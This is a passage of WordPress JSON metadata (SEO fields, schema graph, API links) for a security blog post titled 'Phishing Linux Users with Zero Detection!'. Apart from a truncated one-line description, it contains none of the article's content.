Users with Zero Detection! - Version 2","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.vicarius.io\/blog\/phishing-linux-users-with-zero-detection","og_locale":"en_US","og_type":"article","og_title":"Phishing Linux Users with Zero Detection! - Version 2","og_description":"Introduction All the phishing campaigns that attackers [&hellip;]","og_url":"https:\/\/www.vicarius.io\/blog\/phishing-linux-users-with-zero-detection","og_site_name":"Version 2","article_published_time":"2022-11-02T08:16:44+00:00","article_modified_time":"2023-07-24T10:42:07+00:00","og_image":[{"url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9yhe13g2p7b0kmicvbb12z4.png?tr=w-1800,c-at_max","type":"","width":"","height":""}],"author":"version2hk","twitter_card":"summary_large_image","twitter_misc":{"Written by":"version2hk","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.vicarius.io\/blog\/phishing-linux-users-with-zero-detection#article","isPartOf":{"@id":"https:\/\/version-2.com\/2022\/11\/phishing-linux-users-with-zero-detection\/"},"author":{"name":"version2hk","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/d14d2d3cd77ffdb618b9f1330fe084db"},"headline":"Phishing Linux Users with Zero Detection!","datePublished":"2022-11-02T08:16:44+00:00","dateModified":"2023-07-24T10:42:07+00:00","mainEntityOfPage":{"@id":"https:\/\/version-2.com\/2022\/11\/phishing-linux-users-with-zero-detection\/"},"wordCount":944,"publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/phishing-linux-users-with-zero-detection#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9yhe13g2p7b0kmicvbb12z4.png?tr=w-1800,c-at_max","keywords":["vRx","2022"],"articleSection":["vRx","2022","Press Release"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/version-2.com\/2022\/11\/phishing-linux-users-with-zero-detection\/","url":"https:\/\/www.vicarius.io\/blog\/phishing-linux-users-with-zero-detection","name":"Phishing Linux Users with Zero Detection! - Version 2","isPartOf":{"@id":"https:\/\/version-2.com\/zh\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.vicarius.io\/blog\/phishing-linux-users-with-zero-detection#primaryimage"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/phishing-linux-users-with-zero-detection#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9yhe13g2p7b0kmicvbb12z4.png?tr=w-1800,c-at_max","datePublished":"2022-11-02T08:16:44+00:00","dateModified":"2023-07-24T10:42:07+00:00","breadcrumb":{"@id":"https:\/\/www.vicarius.io\/blog\/phishing-linux-users-with-zero-detection#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.vicarius.io\/blog\/phishing-linux-users-with-zero-detection"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.vicarius.io\/blog\/phishing-linux-users-with-zero-detection#primaryimage","url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9yhe13g2p7b0kmicvbb12z4.png?tr=w-1800,c-at_max","contentUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9yhe13g2p7b0kmicvbb12z4.png?tr=w-1800,c-at_max"},{"@type":"BreadcrumbList","@id":"https:\/\/www.vicarius.io\/blog\/phishing-linux-users-with-zero-detection#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/version-2.com\/"},{"@type":"ListItem","position":2,"name":"Phishing Linux Users with Zero Detection!"}]},{"@type":"WebSite","@id":"https:\/\/version-2.com\/zh\/#website","url":"https:\/\/version-2.com\/zh\/","name":"Version 2","description":"","publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/version-2.com\/zh\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/version-2.com\/zh\/#organization","name":"Version 2","url":"https:\/\/version-2.com\/zh\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","contentUrl":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","width":1795,"height":335,"caption":"Version 2"},"image":{"@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/d14d2d3cd77ffdb618b9f1330fe084db","name":"version2hk","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g","caption":"version2hk"},"sameAs":["http:\/\/version2xfortcom.wordpress.com"],"url":"https:\/\/version-2.com\/en\/author\/version2hk\/"}]}},"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pbQRKm-fre","jetpack_featured_media_url":"","post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/posts\/59348","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/users\/143524195"}],"replies":[{"embeddable":true,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/comments?post=59348"}],"version-history":[{"count":6,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/posts\/59348\/revisions"}],"predecessor-version":[{"id":69472,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/posts\/59348\/revisions\/69472"}],"wp:attachment":[{"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/media?parent=59348"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/categories?post=59348"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/tags?post=59348"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}